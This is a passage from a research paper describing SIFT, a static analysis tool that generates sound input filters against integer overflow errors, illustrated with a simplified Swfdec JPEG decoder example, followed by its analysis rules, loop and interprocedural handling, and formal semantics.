35 / (8 *max_v_sample);
36 for (i = 0; i < dec->n_components; i++) {
37 int rowstride;
38 int image_size;
39 dec->components[i].h_subsample=max_h_sample /
40 dec->components[i].h_sample;
41 dec->components[i].v_subsample=max_v_sample /
42 dec->components[i].v_sample;
43 rowstride=dec->width_blocks *8*max_h_sample /
44 dec->components[i].h_subsample;
45 image_size=rowstride *(dec->height_blocks *8*
46 max_v_sample / dec->components[i].v_subsample);
47 dec->components[i].image = malloc (image_size);
48 }
49 }
Figure 2. Simplified Swfdec source code. Input statement
annotations appear in comments.
jpeg_decoder_init_decoder() (line 22) to allocate mem-
ory buffers for the JPEG image.
There is an integer overflow vulnerability at lines 43-47
where Swfdec calculates the size of the buffer for a JPEG
image as:
rowstride *(dec->height_block *8*max_v_sample /
dec->components[i].v_subsample)
At this program point, rowstride equals:
(jpeg_width + 8 *max_h_sample - 1) / (8 *max_h_sample)
*8*max_h_sample / (max_h_sample / h_sample)
while the rest of the expression equals
(jpeg_height + 8 *max_v_sample - 1) / (8 *max_v_sample)
*8*max_v_sample / (max_v_sample / v_sample)
wherejpeg_height is the 16-bit height input field value that
Swfdec reads at line 9 and jpeg_width is the 16-bit widthinput field value that Swfdec reads at line 11. h_sample is
one of the horizontal sampling factor values that Swfdec
reads at line 14, while max_h_sample is the maximum
horizontal sampling factor value. v_sample is one of the
vertical sampling factor values that Swfdec reads at line 17,
whilemax_v_sample is the maximum vertical sampling
factor value. Malicious inputs with specifically crafted val-
ues in these input fields can cause the image buffer size cal-
culation to overflow. In this case Swfdec allocates an image
buffer that is smaller than required and eventually writes be-
yond the end of the allocated buffer.
The loop at lines 13-20 reads an array of horizontal and
vertical factor values. Swfdec computes the maximum val-
ues of these factors in the loop at lines 26-31. It then uses
these values to compute the size of the allocated buffer at
each iteration in the loop (lines 36-48).
Analysis Challenges: This example highlights several chal-
lenges that SIFT must overcome to successfully analyze and
generate a filter for this program. First, the expression for
the size of the buffer uses pointers to access values derived
from input fields. To overcome this challenge, SIFT uses an
alias analysis [17] to reason precisely about expressions with
pointers.
Second, the memory allocation site (line 47) occurs in a
loop, with the size expression referencing input values read
in a different loop (lines 13-19). Different instances of the
same input field ( h_sample andv_sample ) are used to
compute (potentially different) sizes for different blocks of
memory allocated at the same site. To reason precisely about
these different instances, the analysis works with an abstrac-
tion that materializes, on demand, abstract representatives of
accessed input field and computed values (see Section 3). To
successfully analyze the loop, the analysis uses a new loop
invariant synthesis algorithm (which exploits a new expres-
sion normalization technique to reach a fixed point).
Finally, Swfdec reads the input fields (lines 14 and 17)
and computes the size of the allocated memory block (lines
45-46) in different procedures. SIFT therefore uses an in-
terprocedural analysis that propagates symbolic conditions
across procedure boundaries to obtain precise symbolic con-
ditions.
We next describe how SIFT generates a sound input filter
to nullify this integer overflow error.
Source Code Annotations: SIFT provides an declarative
specification interface that enables the developer to spec-
ify which statements read which input fields. In this ex-
ample, the developer specifies that the application reads
the input fields jpeg_height ,jpeg_width ,h_sample , and
v_sample at lines 10, 12, 15-16, and 18-19 in Figure 2.
SIFT uses this specification to map the variables dec-
>height ,dec->width ,dec->components[i].h_sample ,
anddec->components[i].v_sample at lines 9, 11, 14, and
4 2013/8/5
C:safe((((sext(jpeg _width[16],32) + 8[32]×sext(h_sample (1)[4],32)−1[32])/(8[32]×sext(h_sample (1)[4],32))
×8[32]×sext(h_sample (1)[4],32))/(sext(h_sample (1)[4],32)/sext (h_sample (2)[4],32)))
×(((sext(jpeg _height[16],32) + 8[32]×sext(v_sample (1)[4],32)−1[32])/(8[32]×sext(v_sample (1)[4],32))
×8[32]×sext(v_sample (1)[4],32))/(sext(v_sample (1)[4],32)/sext (v_sample (2)[4],32))))
Figure 3. The symbolic condition Cfor the Swfdec example. Subexpressions in Care bit vector expressions. The superscript
indicates the bit width of each expression atom. “ sext(v,w)" is the signed extension operation that transforms the value vto
the bit width w.
17 to the corresponding input field values. The field names
h_sample andv_sample map to two arrays of input fields
that Swfdec reads in the loop at lines 14 and 17.
Compute Symbolic Condition: SIFT uses a demand-
driven, interprocedural, backward static analysis to com-
pute the symbolic condition Cin Figure 3. We use notation
“safe(e)" in Figure 3 to denote that overflow errors should
not occur in any step of the evaluation of the expression e.
Subexpressions in Care in bit vector expression form so that
the expressions accurately reflect the representation of the
numbers inside the computer as fixed-length bit vectors as
well as the semantics of arithmetic and logical operations as
implemented inside the computer on these bit vectors.
In Figure 3, the superscripts indicate the bit width of each
expression atom. sext(v,w)is the signed extension opera-
tion that transforms the value vto the bit width w. SIFT also
tracks the sign of each arithmetic operation in C. For sim-
plicity, Figure 3 omits this information. SIFT soundly han-
dles the loops that access the input field arrays h_sample
andv_sample . The generated Creflects the fact that the
variabledec->components[i].h_sample and the variable
max_h_sample might be two different elements in the
input array h_sample . InC,h_sample (1)corresponds
tomax_h_sample andh_sample (2)corresponds to dec-
>components[i].h_sample . SIFT handles v_sample sim-
ilarly.
Cincludes all intermediate expressions evaluated at lines
32-35 and 39-46. In this example, Ccontains only a single
term in the form of safe (e). However, if there may be multi-
ple execution paths, SIFT generates a symbolic condition C
that conjuncts multiple terms in the form of safe (e)to cover
all paths.
Generate Input Filter: Starting with the symbolic condi-
tionC, SIFT generates an input filter that discards any input
that violates C, i.e., for any term safe (e)inC, the input trig-
gers integer overflow errors when evaluating e(including all
subexpressions). The generated filter extracts all instances of
the input fields jpeg_height ,jpeg_width ,h_sample , and
v_sample (these are the input fields that appear in C) from
an incoming input. It then iterates over all combinations of
pairs of the input fields h_sample andv_sample to con-
sider all possible bindings of h_sample (1),h_sample (2),
v_sample (1), andv_sample (2)inC. For each binding, itchecks the entire evaluation of C(including the evaluation
of all subexpressions) for overflow. If there is no overflow
in any evaluation, the filter accepts the input, otherwise it
rejects the input.
3. Static Analysis
This section presents the static analysis algorithm in SIFT.
We have implemented our static analysis for C programs
using the LLVM Compiler Infrastructure [2].
3.1 Core Language and Notation
s:=l:x= read( f) | l:x=c|l:x=y|
l:x=y op z |l:x=∗p|l:∗p=x|
l:p= malloc | l: skip | s′;s′′|
l: if ( x)s′else s′′|l: while ( x) {s′}
s, s′, s′′∈Statement f∈InputField
x, y, z, p∈Var c∈Int l∈Label
Figure 4. The Core Programming Language
Figure 4 presents the core language that we use to present
the analysis. The language is modeled on a standard lowered
program representation in which 1) nested expressions are
converted into sequences of statements of the form l:x=y
op z (wherex,y, andzare either non-aliased variables or
automatically generated temporaries) and 2) all accesses to
potentially aliased memory locations occur in load or store
statements of the form l:x=∗porl:∗p=x. Each statement
contains a unique label l∈Label.
A statement of the form “ l:x= read(f)” reads a value
from an input field f. Because the input may contain mul-
tiple instances of the field f, different executions of the
statement may return different values. For example, the loop
at lines 14-17 in Figure 2 reads multiple instances of the
h_sample andv_sample input fields.
Labels and Pointer Analysis: Figure 5 presents three utility
functionsfirst :Statement→Label,last:Statement→
Label, andlabels :Statement→Label in our notations.
Intuitively, given a statement s,first mapssto the label that
corresponds to the first atomic statement inside s;last maps
sto the label that corresponds to the last atomic statement
insides;labels mapssto the set of labels that are inside s.
5 2013/8/5
first (s) ={first (s′)s=s′;s′′
l otherwise, lis the label of s
last(s) ={last(s′′)s=s′;s′′
l otherwise, lis the label of s
labels (s) =


labels (s′)∪labels (s′′) s=s′;s′′
{l}∪labels (s′) s=while (x){s′}
{l}∪labels (s′)∪labels (s′′)s=if(x)s′elses′′
{l} otherwise, lis the label of s
Figure 5. Definitions of first ,last, andlabels
We use LoadLabel and StoreLabel to denote the set of
labels that correspond to load and store statements, respec-
tively. LoadLabel⊆Label and StoreLabel ⊆Label.
Our static analysis uses an underlying pointer analy-
sis [17] to disambiguate aliases at load and store statements.
The pointer analysis provides two functions no_alias and
must _alias :
no_alias : (StoreLabel×LoadLabel )→Bool
must _alias : (StoreLabel×LoadLabel )→Bool
We assume that the underlying pointer analysis is sound
so that 1)no_alias (lstore,lload) =true only if the load state-
ment at label lloadwill never retrieve a value stored by the
store statement at label lstore; 2)must _alias (lstore,lload) =
true only if the load statement at label lloadwillalways re-
trieve a value from the last memory location that the store
statement at label lstoremanipulates (see Section 4.2 for a
formal definition of the soundness requirements that the alias
anlayisis must satisfy).
3.2 Intraprocedural Analysis
Because it works with a lowered representation, our static
analysis starts with a variable vat a critical program point.
It then propagates vbackward against the control flow to
the program entry point. In this way the analysis computes a
symbolic condition that soundly captures how the program,
starting with input field values, may compute the value of
vat the critical program point. The generated filters use the
analysis results to check whether the input may trigger an
integer overflow error in any of these computations.
Condition Syntax:
Figure 7 presents the definition of symbolic conditions
that our analysis manipulates and propagates. A condition
consists of a set of conjuncts in the form of safe (e), which
represents that the evaluation of the symbolic expression
eshould not trigger an overflow condition (including all
sub-computations in the evaluation, see Section 4.5 for the
formal definition of a program state satisfying a condition).C:=C∧safe(e)| safe( e)
e:=e1op e2|atom
atom :=x|c|f(id)|l(id)
id∈{1, 2, . . . } x∈Var c∈Int
l∈LoadLabel f∈InputField
Figure 7. The Condition Syntax
Symbolic conditions may contain four kinds of atoms:
crepresents a constant, xrepresents the variable x,f(id)
represents the value of an input field f(the analysis uses
the natural number idto distinguish different instances of
f), andl(id)represents a value returned by a load statement
with the label l(the analysis uses the natural number idto
distinguish values loaded at different executions of the load
statement).
Analysis Framework: Given a series of statements s, a label
lwithins(l∈labels (s)), and a symbolic condition Cat
the program point after the corresponding statement with
the labell, our demand-driven backwards analysis computes
a symbolic condition F(s,l,C ). The analysis ensures that
ifF(s,l,C )holds before executing s, thenCwill hold
whenever the execution reaches the program point after the
corresponding statement with the label l(see Section 4.5 for
the formal definition).
Given a program s0as a series of statements and a vari-
ablevat a critical site associated with the label l, our analysis
generates the condition F(s,l,safe(v))to create an input fil-
ter that checks whether the input may trigger an integer over-
flow error in the computations that the program performs to
obtain the value of vat the critical site.
Analysis of Assignment, Conditional, and Sequence
Statements: Figure 6 presents the analysis rules for basic
program statements. The analysis of assignment statements
replaces the assigned variable xwith the assigned value ( c,
y,yopz, orf(id), depending on the assignment statement).
Here the notation C[ea/eb]denotes the new symbolic condi-
tion obtained by replacing every occurrence of ebinCwith
ea. The analysis rule for input read statements materializes
a newidto represent the read value f(id). This mecha-
nism enables the analysis to correctly distinguish different
instances of the same input field (because different instances
have different ids).
If the labellidentifies the end of a conditional statement,
the analysis of the statement takes the union of the symbolic
conditions from the analysis of the true and false branches of
the conditional statement. The resulting symbolic condition
correctly takes the execution of both branches into account.
If the label lidentifies a program point within one of the
branches of a conditional statement, the analysis will prop-
agate the condition from that branch only. The analysis of
6 2013/8/5
Statement s Rules
l:x=c F (s, l, C ) =C[c/x]
l:x=y F (s, l, C ) =C[y/x]
l:x=y op z F (s, l, C ) =C[y op z/x ]
l:x=read(f) F(s, l, C ) =C[f(id)/x],f(id)is fresh.
s′;s′′F(s, l, C ) =F(s′, last(s′), F(s′′, l, C)), ifl∈labels (s′′)
F(s, l, C ) =F(s′, l, C), ifl∈labels (s′)
l:if(v)s′elses′F(s, l, C ) =F(s′, last(s′), C)∧F(s′′, last(s′′), C)
F(s, l′, C) =F(s′, l′, C), ifl′∈labels (s′)
F(s, l′, C) =F(s′′, l′, C), ifl′∈labels (s′′)
l:while (v){s′}F(s, l, C ) =Cfix∧C, ifnorm (F(s′, last(s′), Cfix∧C)) =Cfix
F(s, l′, C) =F(s, l, C′), ifF(s′, l′, C) =C′andl′∈labels (s′)
l:p=malloc F(s, l, C ) =C
l:x=∗p F (s, l, C ) =C[l(id)/x],l(id)is fresh.
l:∗p=x F (s, l, C ) =C(l1(id1), l, x)(l2(id2), l, x). . .(ln(idn), l, x)for all l1(id1), . . . , l n(idn)inC, where:
C(lload(id), l, x) =

C no _alias(l, lload)
C[x/l load(id)]¬no_alias(l, lload)∧must _alias(l, lload)
C[x/l load(id)]∧C¬no_alias(l, lload)∧¬must _alias(l, lload)
Figure 6. Static analysis rules. The notation C[ea/eb]denotes the symbolic condition obtained by replacing every occurrence
ofebinCwithea.norm (C)is the normalization function that transforms the condition Cto an equivalent normalized
condition.
sequences of statements propagates the symbolic expression
set backwards through the statements in sequence.
Analysis of Load and Store Statements: The analysis of
a load statement x=∗preplaces the assigned variable x
with a materialized abstract value l(id)that represents the
loaded value. For input read statements, the analysis uses a
newly materialized idto distinguish values read on different
executions of the load statement.
The analysis of a store statement ∗p=xuses the alias
analysis to appropriately match the stored value xagainst
all loads that may return that value. Specifically, the analysis
locates allli(idi)atoms inCthat either may or must load a
valuevthat the store statement stores into the location p. If
the alias analysis determines that the li(idi)expression must
loadx(i.e., the corresponding load statement will always
access the last value that the store statement stored into
locationp), then the analysis of the store statement replaces
all occurrences of li(idi)withx.
If the alias analysis determines that the li(idi)expression
may loadx(i.e., on some executions the corresponding load
statement may load x, on others it may not), then the analysis
produces two symbolic conditions: one with li(idi)replaced
byx(for executions in which the load statement loads x)
and one that leaves li(idi)in place (for executions in which
the load statement loads a value other than x).
We note that, if the pointer analysis is imprecise, the sym-
bolic condition may become intractably large. SIFT uses the
DSA algorithm [17], a context-sensitive, unification-based
pointer analysis. We found that, in practice, this analysis1Input : Expression e
2Output : Normalized expression enorm
3
4enorm←e
5f_cnt←{all→0}
6l_cnt←{all→0}
7for ainAtoms (e)do
8 ifais in form f(id)then
9 nextid←f_cnt(f) + 1
10 f_cnt←f_cnt[f→nextid ]
11 enorm←enorm[∗f(nextid )/f(id)]
12 else if ais in form l(id)then
13 nextid←l_cnt(l) + 1
14 l_cnt←l_cnt[l→nextid ]
15 enorm←enorm[∗l(nextid )/l(id)]
16 end if
17end
18for ainAtoms (enorm)do
19 ifais in form∗f(id)then
20 enorm←enorm[f(id)/∗f(id)]
21 else if ais in form∗l(id)then
22 enorm←enorm[l(id)/∗l(id)]
23 end if
24end
Figure 8. Normalization function norm (e).Atom (e)iter-
ates over the atoms in the expression efrom left to right.
is precise enough to enable SIFT to efficiently analyze our
benchmark applications (see Figure 14 in Section 5.2).
Analysis of Loop Statements: The analysis uses a fixed-
point algorithm to synthesize the loop invariant Cfixrequired
to analyze while loops. Specifically, the analysis of a state-
7 2013/8/5
ment while (x){s′}computes a sequence of symbolic condi-
tionsCi, whereC0=∅andCi=norm (F(s′,last (s′),C∧
Ci−1)). Conceptually, each successive symbolic condition
Cicaptures the effect of executing an additional loop itera-
tion. The analysis terminates when it reaches a fixed point
(i.e., when it has performed niterations such that Cn=
Cn−1). HereCnis the discovered loop invariant. This fixed
point correctly summarizes the effect of the loop (regardless
of the number of iterations that it may perform).
The loop analysis normalizes the analysis result
F(s′,last (s′),C∧Ci−1)after each iteration. For a symbolic
conditionC=safe(e1)∧...∧safe(en), the normalization
ofCisnorm (C) =remove _dup(safe(norm (e1))∧...∧
safe(norm (en))), wherenorm (ei)is the normalization of
each individual expression in C(using the algorithm pre-
sented in Figure 8) and remove _dup()removes duplicate
conjuncts from the condition.
Normalization facilitates loop invariant discovery for
loops that read input fields or load values via pointers. Each
analysis of the loop body during the fixed point computa-
tion produces new materialized values f(id)andl(id)with
freshids. The new materialized f(id)represent input fields
that the current loop iteration reads; the new materialized
l(id)represent values that the current loop iteration loads via
pointers. The normalization algorithm appropriately renum-
bers theseids in the new symbolic condition so that the first
appearance of each idis in lexicographic order. Because the
normalization only renumbers ids, the normalized condition
is equivalent to the original conditions (see Section 4.5). This
normalization enables the analysis to recognize loop invari-
ants that show up as equivalent successive analysis results
that differ only in the materialized ids that they use to repre-
sent input fields and values accessed via pointers.
The above algorithm will reach a fixed point and ter-
minate if it computes the symbolic condition of a value
that depends on at most a statically fixed number of val-
ues from the loop iterations. For example, our algorithm
is able to compute the symbolic condition of the size pa-
rameter value of the memory allocation in Figure 2 —
the value of this size parameter depends only on the val-
ues ofjpeg_width andjpeg_height , the current values
ofh_sample andv_sample , and the maximum values of
h_sample andv_sample , each of which comes from one
previous iteration of the loop at line 26-31.
Note that the algorithm will not reach a fixed point if it
attempts to compute a symbolic condition that contains an
unbounded number of values from different loop iterations.
For example, the algorithm will not reach a fixed point if it
attempts to compute a symbolic condition for the sum of a
set of numbers computed within the loop (the sum depends
on values from all loop iterations). To ensure termination,
our current implemented algorithm terminates the analysis1Input : A symbolic condition C
2Output :F(lcall:v=call proc v 1. . . v k, lcall, C),
3 where proc is defined as:
4 proc(a1,a2,. . .,ak) { s;ret v ret}
5Where :l1(id1), l2(id2), . . . , l n(idn)
6 are all atoms of the form l(id)
7 that appear in S.
8
9R←∅
10ST0←F(s, last (s),safe (vret))
11for e0inexprs (ST0[v1/a1]. . .[vn/an])do
12 ST1←F(s, last (s),safe (l1(id1)))
13 for e1inexprs (ST1[v1/a1]. . .[vn/an])do
14 ...
15 STn←F(sb, last(s),safe (ln(idn)))
16 for eninexprs (STn[v1/a1]. . .[vn/an])do
17 e′
0←make _fresh (e0, C)
18 ...
19 e′
n←make _fresh (en, C)
20 R←R∧C[e′
0/v]. . .[e′
i/label i(idi)]. . .
21 end
22 ...
23 end
24end
25F(lcall:v=call proc v 1. . . v k, lcall, C)←R
Figure 9. Procedure Call Analysis Algorithm.
make _fresh (e,C)renumbers ids ineso that oc-
currences of l(id)andf(id)will not conflict with
the condition C.exprs (C)returns the set of expres-
sions that appear in the conjuncts of C. For example,
expr(safe(e1)∧safe(e2)) ={e1,e2}.
and fails to generate a symbolic condition Cif it fails to
reach a fixed point after ten iterations.
In practice, we expect that many programs may contain
expressions whose values depend on an unbounded number
of values from different loop iterations. Our analysis can
successfully analyze such programs because it is demand
driven — it only attempts to obtain precise symbolic repre-
sentations of expressions that may contribute to the values of
expressions in the analyzed symbolic condition C(which, in
our current system, are ultimately derived from expressions
that appear at memory allocation and block copy sites). Our
experimental results indicate that our approach is, in prac-
tice, effective for this set of expressions, specifically because
these expressions tend to depend on at most a fixed number
of values from loop iterations.
3.3 Inter-procedural Analysis
Analyzing Procedure Calls: Figure 9 presents the inter-
procedural analysis for procedure call sites. Given a sym-
bolic condition Cand a function call statement lcall:
v=callproc v 1... vkthat invokes a procedure proc(a1,
8 2013/8/5
a2,...,ak) {s;ret vret}, the analysis computes F(v=
callproc v 1... vk,lcall,C).
Conceptually, the analysis performs two tasks. First, it re-
places any occurrences of the procedure return value vinC
(the symbolic condition after the procedure call) with sym-
bolic expressions that represent the values that the proce-
dure may return. Second, it transforms Cto reflect the ef-
fect of any store instructions that the procedure may exe-
cute. Specifically, the analysis finds expressions l(id)inC
that represent values that 1) the procedure may store into a
locationp2) that the computation following the procedure
may access via a load instruction that may access (a poten-
tially aliased version of) p. It then replaces occurrences of
l(id)inCwith symbolic expressions that represent the cor-
responding values computed (and stored into p) within the
procedure.
The analysis examines the invoked procedural body s
to obtain the symbolic expressions that corresponds to
the return value (see line 10) or the value of l(id)(see
lines 12 and 15). The analysis avoids redundant analysis
of the invoked procedure by caching the analysis results
F(s,last (s),safe(vret))andF(s,last (s),safe(l(id)))for
reuse.
Note that symbolic expressions derived from an analysis
of the invoked procedure may contain occurrences of the
formal parameters a1,...,ak. The interprocedural analysis
translates these symbolic expressions into the name space of
the caller by replacing occurrences of the formal parameters
a1,...,akwith the corresponding actual parameters v1,...,vk
from the call site (see lines 11, 13, and 16 in Figure 9).
Also note that the analysis carefully renumbers the ids
in the symbolic expressions derived from an analysis of the
invoked procedure before the replacements (see lines 17-19).
This ensures that the occurances of f(id)ands(id)in the
expressions are fresh in C.
Propagation to Program Entry: To derive the final sym-
bolic condition at the start of the program, the analysis prop-
agates the current symbolic condition up the call tree through
procedure calls until it reaches the start of the program.
When the propagation reaches the entry of the current pro-
cedureproc , the algorithm uses the procedure call graph to
find all call sites that may invoke proc .
It then propagates the current symbolic condition Cto the
callers ofproc , appropriately translating Cinto the naming
context of the caller by substituting any formal parameters of
proc that appear in Cwith the corresponding actual param-
eters from the call site. The analysis continues this propaga-
tion until it has traced out all paths in the call graph from the
initial critical site where the analysis started to the program
entry point. The final symbolic condition Cis the conjunc-
tion of the conditions derived along all of these paths.3.4 Extension to C Programs
We next describe how to extend our analysis to real world C
programs to generate input filters.
Identify Critical Sites: SIFT transforms the application
source code into the LLVM intermediate representation
(IR) [2], scans the IR to identify critical values (i.e., size
parameters of memory allocation and block copy call sites)
inside the developer specified module, and then performs the
static analysis for each identified critical value. By default,
SIFT recognizes calls to standard C memory allocation rou-
tines (such as malloc ,calloc , andrealloc ) and block copy
routines (such as memcpy ). SIFT can also be configured to
recognize additional memory allocation and block copy rou-
tines (for example, dMalloc in Dillo).
Bit Width and Signness: SIFT extends the analysis de-
scribed above to track the bit width of each expression atom.
It also tracks the sign of each expression atom and arith-
metic operation and correctly handles extension and trunca-
tion operations (i.e., signed extension, unsigned extension,
and truncation) that change the width of a bit vector. SIFT
therefore faithfully implements the representation of integer
values in the C program.
Function Pointers and Library Calls: SIFT uses its under-
lying pointer analysis [17] to disambiguate function point-
ers. It can analyze programs that invoke functions via func-
tion pointers.
The static analysis may encounter procedure calls (for ex-
ample, calls to standard C library functions) for which the
source code of the callee is not available. A standard way to
handle this situation is to work with an annotated procedure
declaration that gives the static analysis information that it
can use to analyze calls to the procedure. If code for an in-
voked procedure is not available, by default SIFT currently
synthesizes information that indicates that symbolic expres-
sions are not available for the return value or for any values
accessible (and therefore potentially stored) via procedure
parameters (code following the procedure call may load such
values). This information enables the analysis to determine
if the return value or values accessible via the procedure pa-
rameters may affect the analyzed symbolic condition C. If
so, SIFT does not generate a filter. Because SIFT is demand-
driven, this mechanism enables SIFT to successfully analyze
programs with library calls (all of our benchmark programs
have such calls) as long as the calls do not affect the analyzed
symbolic conditions.
Annotations for Input Read Statement: SIFT provides
a declarative specification language that developers use to
indicate which input statements read which input fields. In
our current implementation these statements appear in the
source code in comments directly below the C statement
that reads the input field. See lines 10, 12, 15-16, and 18-
9 2013/8/5
19 in Figure 2 for examples that illustrate the use of the
specification language in the Swfdec example. The SIFT
annotation generator scans the comments, finds the input
specification statements, then inserts new nodes into the
LLVM IR that contain the specified information. Formally,
this information appears as procedure calls of the following
form:
v = SIFT_Input("field_name", w);
wherevis a program variable that holds the value of the
input field with the field name field_name . The width (in
bits) of the input field is w. The SIFT static analyzer recog-
nizes such procedure calls as specifying the correspondence
between input fields and program variables and applies the
appropriate analysis rule for input read statements (see Fig-
ure 6).
Input Filter Generation: We prune any conjuncts that con-
tain residual occurrences of abstract materialized values
l(id)in the final symbolic condition C. We also replace ev-
ery residual occurance of program variables vwith 0. For-
mally speaking, these residual occurances correspond to ini-
tial values of the program state σand ̄hin abstract semantics
(see Section 4.3). The result condition CInpwill contain only
input value and constant atoms.
The filter operates as follows. It first uses an existing
parser for the input format to parse the input and extract the
input fields used in the input condition CInp. Open source
parsers are available for a wide of input file formats, in-
cluding all of the formats in our experimental evaluation [1].
These parsers provide a standard API that enables clients to
access the parsed input fields.
The generated filter evaluates each conjunct expression
inCInpby replacing each symbolic input variable in the
expression with the corresponding concrete value from the
parsed input. If an integer overflow may occur in the evalu-
ation of any expression in CInp, the filter discards the input
and optionally raises an alarm. For input field arrays such as
h_sample andv_sample in the Swfdec example (see Sec-
tion 2), the input filter enumerates all possible combinations
of concrete values (see Figure 12 for the formal definition
of condition evaluation). The filter discards the input if any
combination can trigger the integer overflow error.
Given multiple symbolic conditions generated from mul-
tiple critical program points, SIFT can create a single effi-
cient filter that first parses the input, then checks the input
against all symbolic conditions in series on the parsed input.
This approach amortizes the overhead of reading the input
(in practice, reading the input consumes essentially all of the
time required to execute the filter, see Figure 15) over all of
the symbolic condition checks.4. Soundness of the Static Analysis
We next formalize our static analysis algorithm on the core
language in Figure 4 and discuss the soundness of the anal-
ysis. We focus on the intraprocedural analysis and omit a
discussion of the interprocedural analysis as it uses standard
techniques based on summary tables.
4.1 Dynamic Semantics of the Core Language
Program State: We define the program state
(σ,ρ,ς,ρ,Inp )as follows:
σ: Var→(Loc + Int + {undef}) ς: Var→Bool
ρ: Loc→(Loc + Int + {undef}) ρ: Loc→Bool
Inp: InputField→P(Int)
σandρmap variables and memory locations to their cor-
responding values. We use undef to represent unintialized
values. We define that if any operand of an arithmetic oper-
ation is undef, the result of the operation is also undef. Inp
represents the input file, which is unchanged during the exe-
cution.ςmaps each variable to a boolean flag, which tracks
whether the computation that generates the value of the vari-
able (including all sub-computations) generates an overflow.
ρmaps each memory location to a boolean overflow flag
similar toς.
The initial states σ0andρ0map all variables and loca-
tions to undef. The initial states of ς0andρ0map all vari-
ables and locations to false. The values of uninitialized vari-
ables and memory locations are undefined as per the C lan-
guage specification standard.
Small Step Rules: Figure 10 presents the small step dy-
namic semantics of the language. Note that in Figure 10,
overflow (a,b,op )is a function that returns true if and only
if the computation aopb causes overflow. A main point of
departure from standard languages is that we also update ς
andρto track overflow errors during each execution step.
For example, the op rule in Figure 10 appropriately updates
the overflow flag of xinςby checking whether the com-
putation that generates the value of x(including the sub-
computations that generates the value of yandz) results in
an overflow condition.
4.2 Soundness of the Pointer Analysis
Our analysis uses an underlying pointer analysis [17] to
analyze programs that use pointers. We formally state our
assumptions about the soundness of the underlying pointer
alias analysis as follows:
Definition 1 (Soundness of no_alias andmust _alias ).
Given a sequence of execution
⟨s0,σ0,ρ0,ς0,ρ0⟩−→⟨s1,σ1,ρ1,ς1,ρ1⟩−→···
and two labels lstore,lload, wherelstoreis the label for the
store statement sstoresuch thatsstore= “lstore:∗p=x”
10 2013/8/5
readc∈Inp(f)σ′=σ[x→c]ς′=ς[x→false]
⟨l:x=read(f),σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ′,ρ,ς′,ρ,Inp⟩constσ′=σ[x→c]ς′=ς[x→false]
⟨l:x=c,σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ′,ρ,ς′,ρ,Inp⟩
assignσ′=σ[x→σ(y)]ς′=ς[x→ς(y)]
⟨l:x=y,σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ′,ρ,ς′,ρ,Inp⟩mallocξ∈Loc ξ is freshσ′=σ[p→ξ]ς′=ς[p→false]
⟨l:p=malloc,σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ′,ρ,ς′,ρ,Inp⟩
seq-1⟨null: skip ;s,σ,ρ,ς,ρ,Inp⟩−→⟨s,σ,ρ,ς,ρ,Inp⟩loadσ(p) =ξ ξ∈Loc σ′=σ[x→ρ(ξ)]ς′=ς[x→ρ(ξ)]
⟨l:x=∗p,σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ′,ρ,ς′,ρ,Inp⟩
seq-2⟨s,σ,ρ,ς,ρ,Inp⟩−→⟨s′′,σ′,ρ′,ς′,ρ′,Inp⟩
⟨s;s′,σ,ρ,ς,ρ,Inp⟩−→⟨s′′;s′,σ′,ρ′,ς′,ρ′,Inp⟩storeσ(p) =ξ ξ∈Loc ρ′=ρ[ξ→σ(x)]ρ′=ρ[ξ→ς(x)]
⟨l:∗p=x,σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ,ρ′,ς,ρ′,Inp⟩
opσ(y)/∈Loc σ (z)/∈Loc b =ς(y)∨ς(z)∨overflow (σ(y),σ(z),op)
⟨l:x=yopz,σ,ρ,ς,ρ,Inp ⟩−→⟨ nil: skip,σ[x→σ(y)opσ(z)],ρ,ς[x→b],ρ,Inp⟩
if-tσ(x)̸= 0
⟨l:if(x)selses′,σ,ρ,ς,ρ,Inp⟩−→⟨s,σ,ρ,ς,ρ,Inp⟩if-fσ(x) = 0
⟨l:if(x)selses′,σ,ρ,ς,ρ,Inp⟩−→⟨s′,σ,ρ,ς,ρ,Inp⟩
while-fσ(x) = 0
⟨l:while(x){s},σ,ρ,ς,ρ,Inp⟩−→⟨ nil: skip,σ,ρ,ς,ρ,Inp⟩while-tσ(x)̸= 0s′=s;l:while(x){s}
⟨l:while(x){s},σ,ρ,ς,ρ,Inp⟩−→⟨s′,σ,ρ,ς,ρ,Inp⟩
Figure 10. The small step operational semantics of the language. “nil" is a special label reserved by the semantics.
andlloadis the label for the load statement sloadsuch that
sload= “lload:x′=∗p′”, we have:
no_alias (lstore,lload)→
∀i,first (si)=lstore∀j,first (sj)=lload,i<jσi(p)̸=σj(p′)
must _alias (lstore,lload)→
∀i,first (si)=lstore∀j,first (sj)=lload,i<j
((∀k,i<k<jfirst (sk)̸=lstore)→(σi(p) =σj(p′)))
Intuitively, 1) no_alias (lstore,lload) = true only if
the load statement at label lload will never retrieve a
value stored by the store statement at label lstore; 2)
must _alias (lstore,lload) =true only if the load statement at
labellloadwill always retrieve a value from the last memory
location that the store statement at label lstoremanipulates
4.3 Abstract Semantics
We next define an abstract semantics that allows us to cer-
tify the operation of our static analysis algorithm. The key
difference between the abstract and original semantics is
that the abstract semantics enables the non-deterministic
branch selection of conditional statements (i.e., if- and
while-statements) and the use of a non-deterministic mem-
ory model. This accurately captures how our analysis ig-
nores control flow conditions and uses an underlying pointer
analysis to handle pointers.
Abstract Program State: We define abstract program state
(σ,ς, ̄h,Inp )as follows:
σ: Var→Int ς: Var→Bool
 ̄h: LoadLabel→P(Int×Bool)
Intuitively,σandςare the counterparts of σandςin the
original semantics, but σandςonly track values and flags forvariables that have integer values.  ̄hmaps the label of each
load statement to the set of values that the load statement
may obtain from the memory.
We define the initial state σ0andς0to map all variables
to0and false respectively. We define the initial state  ̄h0to
map all labels of load statements to the empty set.
Small Step Rules: Figure 11 presents the small step rules
for the abstract semantics.
The rules for conditional, loop, malloc, load, and store
statements capture the main difference between the abstract
semantics and the original semantics. The rules for condi-
tional and while statements (if-t, if-f, while-t, and while-f
rules) in abstract semantics ignore branch conditions and
allow non-deterministic execution of either path. The rule
for store statements maintains the state  ̄haccording to
the alias information. The rule for load statements non-
deterministically returns an element from the corresponding
set in  ̄h.
4.4 Relationship of the Original and the Abstract
Semantics
We next formally state the relationship of the original se-
mantics and the abstract semantics as the follow theorem.
